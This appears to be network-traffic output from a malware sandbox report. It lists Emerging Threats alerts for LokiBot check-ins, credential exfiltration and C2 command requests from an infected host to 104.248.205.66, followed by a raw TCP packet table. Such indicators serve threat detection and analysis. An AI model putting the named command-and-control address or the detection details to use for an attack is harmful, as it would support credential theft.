2024-08-29T12:02:51.197441+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49713	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:53.422002+0200	TCP	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	49713	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:27.434952+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49758	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:27.434952+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49758	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:26.720005+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49734	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:26.720005+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49734	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:22.379291+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49756	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:22.379291+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49756	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:37.503478+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49738	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:37.503478+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49738	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:34.970294+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49762	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:34.970294+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49762	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:25.191402+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49758	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:25.191402+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49758	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:04.631989+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49749	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:04.631989+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49749	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:58.527194+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49715	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:58.527194+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49715	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:00.883637+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49716	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:00.883637+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49716	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:07.250483+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49751	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:07.250483+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49751	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:03.415827+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49723	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:03.415827+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49723	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:17.573612+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49754	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:17.573612+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49754	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:22.534398+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49757	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:22.534398+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49757	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:27.594258+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49759	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:27.594258+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49759	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:50.004455+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49744	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:50.004455+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49744	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:47.563972+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49743	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:47.563972+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49743	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:32.566846+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49761	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:32.566846+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49761	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:49.551951+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49767	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:49.551951+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49767	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:37.353714+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49737	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:37.353714+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49737	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:47.295065+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49767	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:47.295065+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49767	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:58.674545+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49716	80	192.168.2.8	104.248.205.66
2024-08-29T12:02:58.674545+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49716	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:02.225701+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49748	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:02.225701+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49748	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:47.408084+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49742	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:47.408084+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49742	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:47.124603+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49766	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:47.124603+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49766	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:12.157744+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49752	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:12.157744+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49752	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:12.552431+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49753	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:12.552431+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49753	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:19.141350+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49730	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:19.141350+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49730	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:52.443390+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49745	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:52.443390+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49745	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:42.563782+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49741	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:42.563782+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49741	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:40.138811+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49740	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:40.138811+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49740	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:21.768470+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49732	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:21.768470+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49732	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:42.267991+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49765	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:42.267991+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49765	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:59.722184+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49747	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:59.722184+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49747	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:44.843250+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49741	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:44.843250+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49741	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:49.848265+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49743	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:49.848265+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49743	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:45.003825+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49742	80	192.168.2.8	104.248.205.66
2024-08-29T12:03:45.003825+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49742	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:15.293513+0200	TCP	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	49754	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:15.293513+0200	TCP	2025381	ET MALWARE LokiBot Checkin	1	49754	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:09.482496+0200	TCP	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	49751	80	192.168.2.8	104.248.205.66
2024-08-29T12:04:09.482496+0200	TCP	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	49751	80	192.168.2.8	104.248.205.66

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 12:02:51.185045004 CEST	49713	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:51.189851999 CEST	80	49713	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:51.189927101 CEST	49713	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:51.192383051 CEST	49713	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:51.197324038 CEST	80	49713	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:51.197441101 CEST	49713	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:51.202373981 CEST	80	49713	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:53.421875000 CEST	80	49713	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:53.421946049 CEST	80	49713	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:53.422002077 CEST	49713	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:53.422004938 CEST	80	49713	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:53.422019005 CEST	80	49713	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:53.422070980 CEST	49713	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:53.422163010 CEST	49713	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:53.427742004 CEST	80	49713	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:53.555851936 CEST	49714	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:53.560833931 CEST	80	49714	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:53.560914993 CEST	49714	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:53.563101053 CEST	49714	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:53.568403006 CEST	80	49714	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:53.568454027 CEST	49714	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:53.573682070 CEST	80	49714	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:56.010449886 CEST	80	49714	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:56.010462046 CEST	80	49714	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:56.010476112 CEST	80	49714	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:56.010523081 CEST	49714	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:56.010531902 CEST	80	49714	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:56.010569096 CEST	49714	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:56.010593891 CEST	80	49714	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:56.010647058 CEST	49714	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:56.073398113 CEST	49715	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:56.078295946 CEST	80	49715	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:56.078423023 CEST	49715	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:56.080645084 CEST	49715	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:56.085505962 CEST	80	49715	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:56.085560083 CEST	49715	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:56.090317965 CEST	80	49715	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:58.527046919 CEST	80	49715	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:58.527065039 CEST	80	49715	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:58.527076006 CEST	80	49715	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:58.527194023 CEST	49715	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:58.527287006 CEST	49715	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:58.527496099 CEST	80	49715	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:58.527548075 CEST	49715	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:58.532071114 CEST	80	49715	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:58.662439108 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:58.667443991 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:58.667522907 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:58.669652939 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:58.674463987 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:02:58.674545050 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:02:58.679524899 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:00.883568048 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:00.883584976 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:00.883604050 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:00.883615017 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:00.883627892 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:00.883636951 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:00.883680105 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:00.883718014 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:00.883718014 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:00.883887053 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:00.888469934 CEST	80	49716	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:00.888520002 CEST	49716	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:01.026061058 CEST	49723	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:01.031090975 CEST	80	49723	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:01.031181097 CEST	49723	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:01.033493042 CEST	49723	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:01.038382053 CEST	80	49723	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:01.038490057 CEST	49723	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:01.044703960 CEST	80	49723	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:03.415740967 CEST	80	49723	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:03.415772915 CEST	80	49723	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:03.415788889 CEST	80	49723	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:03.415827036 CEST	49723	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:03.415884972 CEST	80	49723	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:03.415906906 CEST	49723	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:03.415942907 CEST	49723	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:03.421835899 CEST	80	49723	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:03.553108931 CEST	49725	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:03.557975054 CEST	80	49725	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:03.558057070 CEST	49725	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:03.560518026 CEST	49725	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:03.565264940 CEST	80	49725	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:03.565316916 CEST	49725	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:03.570147038 CEST	80	49725	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:05.911005974 CEST	80	49725	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:05.911021948 CEST	80	49725	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:05.911039114 CEST	80	49725	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:05.911092997 CEST	80	49725	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:05.911113024 CEST	49725	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:05.911169052 CEST	49725	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:05.911278963 CEST	49725	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:05.916409969 CEST	80	49725	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:06.053297043 CEST	49726	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:06.058341026 CEST	80	49726	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:06.058480024 CEST	49726	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:06.060564041 CEST	49726	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:06.065613985 CEST	80	49726	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:06.065701962 CEST	49726	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:06.072217941 CEST	80	49726	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:08.537945032 CEST	80	49726	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:08.537965059 CEST	80	49726	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:08.537977934 CEST	80	49726	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:08.538013935 CEST	80	49726	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:08.538050890 CEST	49726	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:08.538094044 CEST	49726	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:08.538172960 CEST	49726	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:08.543119907 CEST	80	49726	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:08.678198099 CEST	49727	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:08.683106899 CEST	80	49727	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:08.683203936 CEST	49727	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:08.685470104 CEST	49727	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:08.690697908 CEST	80	49727	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:08.690897942 CEST	49727	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:08.695807934 CEST	80	49727	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:11.041562080 CEST	80	49727	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:11.041579962 CEST	80	49727	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:11.041590929 CEST	80	49727	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:11.041687012 CEST	49727	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:11.041752100 CEST	80	49727	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:11.041805029 CEST	49727	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:11.041805029 CEST	49727	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:11.046739101 CEST	80	49727	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:11.177869081 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:11.183166027 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:11.183245897 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:11.185287952 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:11.192022085 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:11.192104101 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:11.196968079 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.150966883 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.150990009 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.151000977 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.151016951 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.151084900 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.151127100 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.151127100 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.151150942 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.151169062 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.151654959 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.151699066 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.152595043 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.152643919 CEST	49728	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.158091068 CEST	80	49728	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.285907030 CEST	49729	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.290852070 CEST	80	49729	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.290954113 CEST	49729	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.293207884 CEST	49729	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.298074007 CEST	80	49729	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:14.298156977 CEST	49729	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:14.302997112 CEST	80	49729	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:16.695571899 CEST	80	49729	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:16.695585966 CEST	80	49729	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:16.695597887 CEST	80	49729	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:16.695611954 CEST	80	49729	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:16.695708990 CEST	49729	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:16.695755959 CEST	49729	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:16.695769072 CEST	49729	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:16.701859951 CEST	80	49729	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:16.833206892 CEST	49730	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:16.839596987 CEST	80	49730	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:16.839692116 CEST	49730	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:16.841785908 CEST	49730	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:16.846681118 CEST	80	49730	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:16.846754074 CEST	49730	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:16.851548910 CEST	80	49730	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:19.141123056 CEST	80	49730	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:19.141285896 CEST	80	49730	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:19.141299009 CEST	80	49730	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:19.141350031 CEST	49730	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:19.141426086 CEST	80	49730	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:19.141447067 CEST	49730	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:19.141463995 CEST	49730	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:19.146559954 CEST	80	49730	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:19.293469906 CEST	49731	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:19.299407959 CEST	80	49731	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:19.299516916 CEST	49731	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:19.301708937 CEST	49731	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:19.308175087 CEST	80	49731	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:19.308275938 CEST	49731	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:19.318880081 CEST	80	49731	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:21.616108894 CEST	80	49731	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:21.616139889 CEST	80	49731	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:21.616154909 CEST	80	49731	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:21.616173029 CEST	80	49731	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:21.616214991 CEST	49731	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:21.616307020 CEST	49731	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:21.619307041 CEST	49731	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:21.624218941 CEST	80	49731	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:21.754429102 CEST	49732	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:21.759358883 CEST	80	49732	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:21.759443998 CEST	49732	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:21.761614084 CEST	49732	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:21.768400908 CEST	80	49732	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:21.768470049 CEST	49732	80	192.168.2.8	104.248.205.66
Aug 29, 2024 12:03:21.773422956 CEST	80	49732	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:24.159673929 CEST	80	49732	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:24.159693003 CEST	80	49732	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:24.159703016 CEST	80	49732	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:24.159714937 CEST	80	49732	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:24.159753084 CEST	80	49732	104.248.205.66	192.168.2.8
Aug 29, 2024 12:03:24.159760952 CEST	49732	80	192.168.2.8	104.248.205.66
